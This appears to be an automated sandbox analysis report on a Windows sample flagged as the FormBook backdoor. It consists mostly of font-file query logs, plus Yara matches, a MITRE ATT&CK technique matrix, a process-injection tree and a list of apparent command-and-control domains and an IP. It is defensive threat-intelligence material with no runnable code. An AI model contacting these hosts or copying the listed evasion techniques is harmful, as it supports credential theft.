          Source: C:\Windows\SysWOW64\cmd.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,4_2_00248572
          Source: C:\Windows\SysWOW64\cmd.exe Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,4_2_00249310
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Users\user\Desktop\n0srYVYMDI.exe VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00246854 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,4_2_00246854
          Source: C:\Windows\SysWOW64\cmd.exe Code function: 4_2_00244D08 GetVersion,4_2_00244D08
          Source: C:\Users\user\Desktop\n0srYVYMDI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match File source: 2.2.n0srYVYMDI.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 2.2.n0srYVYMDI.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

Source: Yara match | File source: 2.2.n0srYVYMDI.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.n0srYVYMDI.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.1786764938.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4169039810.0000000003380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4169280068.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1726895597.0000000004361000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix

Techniques with matching behavior signatures, grouped by tactic. The leading number is the count of signatures that mapped to that technique; the unhighlighted template cells of the matrix carried no counts and are omitted.

Initial Access: 1 Valid Accounts
Execution: 1 Shared Modules
Persistence: 1 Valid Accounts; 1 DLL Side-Loading
Privilege Escalation: 1 Valid Accounts; 1 Access Token Manipulation; 512 Process Injection; 1 Abuse Elevation Control Mechanism; 1 DLL Side-Loading
Defense Evasion: 1 Masquerading; 1 Valid Accounts; 1 Access Token Manipulation; 1 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 512 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Abuse Elevation Control Mechanism; 4 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading
Discovery: 1 System Time Discovery; 241 Security Software Discovery; 2 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 225 System Information Discovery
Collection: 1 Archive Collected Data
Command and Control: 1 Encrypted Channel; 2 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 12 Application Layer Protocol
Reconnaissance, Resource Development, Credential Access, Lateral Movement, Exfiltration, Impact: no techniques with signature counts

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph (ID: 1587617, Sample: n0srYVYMDI.exe, Startdate: 10/01/2025, Architecture: WINDOWS, Score: 100)

Contacted domains/IPs: www.armanshop.xyz, www.wistlnc.net, 10 other IPs or domains
Sample-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 7 other signatures; Performs DNS queries to domains with low reputation (www.armanshop.xyz)

Process tree:
n0srYVYMDI.exe (started)
    Dropped file: C:\Users\user\AppData\...\n0srYVYMDI.exe.log, ASCII
    Signatures: Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes; Switches to a custom stack to bypass stack traces
    n0srYVYMDI.exe (started)
        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
        explorer.exe (injected)
            DNS/IP: www.vitor.live 103.224.212.213, ports 50007, 80, TRELLIAN-AS-APTrellianPtyLimitedAU Australia
            cmd.exe (started)
                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
                cmd.exe (started)
                    conhost.exe (started)

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Source | Detection | Scanner | Label
n0srYVYMDI.exe | 71% | Virustotal |
n0srYVYMDI.exe | 83% | ReversingLabs | Win32.Backdoor.FormBook
n0srYVYMDI.exe | 100% | Avira | TR/AD.Swotter.wffxr
n0srYVYMDI.exe | 100% | Joe Sandbox ML |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label
http://www.wistlnc.net | 0% | Avira URL Cloud | safe
http://www.39474.club | 0% | Avira URL Cloud | safe
http://www.uy-smart-tv-nl.today/m25s/www.vitor.live | 0% | Avira URL Cloud | safe
http://www.ransportationmwmptpro.top/m25s/ | 0% | Avira URL Cloud | safe
http://www.39474.club/m25s/www.oches-a-credito-es.bond | 0% | Avira URL Cloud | safe
http://www.armanshop.xyz/m25s/www.ehills.shop | 0% | Avira URL Cloud | safe
http://www.ealthcare-trends-60670.bond/m25s/www.ental-health-69511.bond | 0% | Avira URL Cloud | safe
http://www.uy-smart-tv-nl.todayReferer: | 0% | Avira URL Cloud | safe
http://www.raceg.cyouReferer: | 0% | Avira URL Cloud | safe
http://www.raceg.cyou/m25s/www.cctofi.cpa | 0% | Avira URL Cloud | safe
http://www.ransportationmwmptpro.topReferer: | 0% | Avira URL Cloud | safe
http://www.wistlnc.net/m25s/ | 0% | Avira URL Cloud | safe
http://www.uy-smart-tv-nl.today/m25s/ | 0% | Avira URL Cloud | safe
http://www.wistlnc.net/m25s/www.armanshop.xyz | 0% | Avira URL Cloud | safe
